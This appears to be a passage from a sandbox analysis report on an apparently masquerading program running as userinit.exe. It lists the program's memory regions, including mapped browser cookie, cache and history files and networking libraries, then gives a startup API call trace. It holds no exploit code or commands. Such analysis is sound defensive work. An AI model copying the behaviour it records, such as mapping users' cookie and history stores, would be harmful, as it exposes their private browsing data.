name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 3025
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 3026
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 3027
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 3028
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 3029
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 3030
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 3031
start_va = 0xa0000
end_va = 0xa0fff
entry_point = 0xa0000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 3032
start_va = 0x29f0000
end_va = 0x2aeffff
entry_point = 0x0
region_type = private
name = "private_0x00000000029f0000"
filename = ""
Region:
id = 3033
start_va = 0x230000
end_va = 0x230fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000230000"
filename = ""
Region:
id = 3034
start_va = 0x6ce90000
end_va = 0x6cea8fff
entry_point = 0x6ce90000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 3035
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 3036
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 3037
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 3038
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 3051
start_va = 0x680000
end_va = 0x6bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000680000"
filename = ""
Region:
id = 3052
start_va = 0x2cb0000
end_va = 0x2daffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002cb0000"
filename = ""
Region:
id = 3053
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 3054
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 3055
start_va = 0x2db0000
end_va = 0x307efff
entry_point = 0x2db0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 3062
start_va = 0x240000
end_va = 0x241fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000240000"
filename = ""
Region:
id = 3063
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 3064
start_va = 0x250000
end_va = 0x250fff
entry_point = 0x250000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 3065
start_va = 0x260000
end_va = 0x261fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000260000"
filename = ""
Region:
id = 3066
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 3067
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 3068
start_va = 0x250000
end_va = 0x250fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 3069
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 3070
start_va = 0x7b0000
end_va = 0x7dbfff
entry_point = 0x7b0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 3071
start_va = 0x3f0000
end_va = 0x3f7fff
entry_point = 0x3f0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 3072
start_va = 0x7e0000
end_va = 0x7effff
entry_point = 0x7e0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 3073
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 3074
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 3075
start_va = 0x3080000
end_va = 0x327ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003080000"
filename = ""
Region:
id = 3076
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 3077
start_va = 0x2af0000
end_va = 0x2c5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002af0000"
filename = ""
Region:
id = 3078
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 3084
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 3085
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 3086
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 3101
start_va = 0x2af0000
end_va = 0x2baffff
entry_point = 0x2af0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 3102
start_va = 0x2c20000
end_va = 0x2c5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c20000"
filename = ""
Thread:
id = 230
os_tid = 0xf80
[0097.035] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0097.035] GetKeyboardType (nTypeFlag=0) returned 4
[0097.035] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0097.035] GetStartupInfoA (in: lpStartupInfo=0xefa9c | out: lpStartupInfo=0xefa9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0097.035] GetVersion () returned 0x1db10106
[0097.035] GetVersion () returned 0x1db10106
[0097.035] GetCurrentThreadId () returned 0xf80
[0097.035] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0xef598, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0097.035] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xef473, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0097.035] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xef588 | out: phkResult=0xef588*=0x0) returned 0x2
[0097.036] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xef588 | out: phkResult=0xef588*=0x0) returned 0x2
[0097.036] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xef588 | out: phkResult=0xef588*=0x0) returned 0x2
[0097.036] lstrcpynA (in: lpString1=0xef473, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0097.036] GetThreadLocale () returned 0x409
[0097.036] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0xef583, cchData=5 | out: lpLCData="ENU") returned 4
[0097.037] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0097.037] lstrcpynA (in: lpString1=0xef490, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0097.037] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0097.037] lstrcpynA (in: lpString1=0xef490, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0097.037] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0097.037] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0097.037] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x283640
[0097.037] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x580000
[0097.037] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x284640
[0097.037] VirtualAlloc (lpAddress=0x580000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x580000
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0xef6bc, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0xef6a8, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0097.038] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0xef6a8, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0097.038] GetVersionExA (in: lpVersionInformation=0xefa40*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xefa40*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0097.039] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0097.039] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0097.039] GetThreadLocale () returned 0x409
[0097.039] GetThreadLocale () returned 0x409
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0xef918, cchData=256 | out: lpLCData="Jan") returned 4
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0xef918, cchData=256 | out: lpLCData="January") returned 8
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0xef918, cchData=256 | out: lpLCData="Feb") returned 4
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0xef918, cchData=256 | out: lpLCData="February") returned 9
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0xef918, cchData=256 | out: lpLCData="Mar") returned 4
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0xef918, cchData=256 | out: lpLCData="March") returned 6
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0xef918, cchData=256 | out: lpLCData="Apr") returned 4
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0xef918, cchData=256 | out: lpLCData="April") returned 6
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0xef918, cchData=256 | out: lpLCData="May") returned 4
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0xef918, cchData=256 | out: lpLCData="May") returned 4
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0xef918, cchData=256 | out: lpLCData="Jun") returned 4
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0xef918, cchData=256 | out: lpLCData="June") returned 5
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0xef918, cchData=256 | out: lpLCData="Jul") returned 4
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0xef918, cchData=256 | out: lpLCData="July") returned 5
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0xef918, cchData=256 | out: lpLCData="Aug") returned 4
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0xef918, cchData=256 | out: lpLCData="August") returned 7
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0xef918, cchData=256 | out: lpLCData="Sep") returned 4
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0xef918, cchData=256 | out: lpLCData="September") returned 10
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0xef918, cchData=256 | out: lpLCData="Oct") returned 4
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0xef918, cchData=256 | out: lpLCData="October") returned 8
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0xef918, cchData=256 | out: lpLCData="Nov") returned 4
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0xef918, cchData=256 | out: lpLCData="November") returned 9
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0xef918, cchData=256 | out: lpLCData="Dec") returned 4
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0xef918, cchData=256 | out: lpLCData="December") returned 9
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0xef918, cchData=256 | out: lpLCData="Sun") returned 4
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0xef918, cchData=256 | out: lpLCData="Sunday") returned 7
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0xef918, cchData=256 | out: lpLCData="Mon") returned 4
[0097.039] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0xef918, cchData=256 | out: lpLCData="Monday") returned 7
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0xef918, cchData=256 | out: lpLCData="Tue") returned 4
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0xef918, cchData=256 | out: lpLCData="Tuesday") returned 8
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0xef918, cchData=256 | out: lpLCData="Wed") returned 4
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0xef918, cchData=256 | out: lpLCData="Wednesday") returned 10
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0xef918, cchData=256 | out: lpLCData="Thu") returned 4
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0xef918, cchData=256 | out: lpLCData="Thursday") returned 9
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0xef918, cchData=256 | out: lpLCData="Fri") returned 4
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0xef918, cchData=256 | out: lpLCData="Friday") returned 7
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0xef918, cchData=256 | out: lpLCData="Sat") returned 4
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0xef918, cchData=256 | out: lpLCData="Saturday") returned 9
[0097.040] GetThreadLocale () returned 0x409
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0xef974, cchData=256 | out: lpLCData="$") returned 2
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0xef974, cchData=256 | out: lpLCData="0") returned 2
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0xef974, cchData=256 | out: lpLCData="0") returned 2
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0xefa6c, cchData=2 | out: lpLCData=",") returned 2
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0xefa6c, cchData=2 | out: lpLCData=".") returned 2
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0xef974, cchData=256 | out: lpLCData="2") returned 2
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0xefa6c, cchData=2 | out: lpLCData="/") returned 2
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0xef974, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0097.040] GetThreadLocale () returned 0x409
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xef940, cchData=256 | out: lpLCData="1") returned 2
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0xef974, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0097.040] GetThreadLocale () returned 0x409
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xef940, cchData=256 | out: lpLCData="1") returned 2
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0xefa6c, cchData=2 | out: lpLCData=":") returned 2
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0xef974, cchData=256 | out: lpLCData="AM") returned 3
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0xef974, cchData=256 | out: lpLCData="PM") returned 3
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0xef974, cchData=256 | out: lpLCData="0") returned 2
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0xef974, cchData=256 | out: lpLCData="0") returned 2
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0xef974, cchData=256 | out: lpLCData="0") returned 2
[0097.040] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0xefa6c, cchData=2 | out: lpLCData=",") returned 2
[0097.041] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0097.041] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0097.042] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0097.042] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0097.042] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0097.042] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0097.042] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0097.042] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0097.042] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0097.042] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0097.042] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0097.042] GetDC (hWnd=0x0) returned 0xe010895
[0097.042] GetDeviceCaps (hdc=0xe010895, index=90) returned 96
[0097.042] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0097.042] GetDC (hWnd=0x0) returned 0xe010895
[0097.042] GetDeviceCaps (hdc=0xe010895, index=104) returned 0
[0097.043] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0097.043] CreatePalette (plpal=0xef6d0) returned 0x1508088e
[0097.043] GetStockObject (i=7) returned 0x1b00017
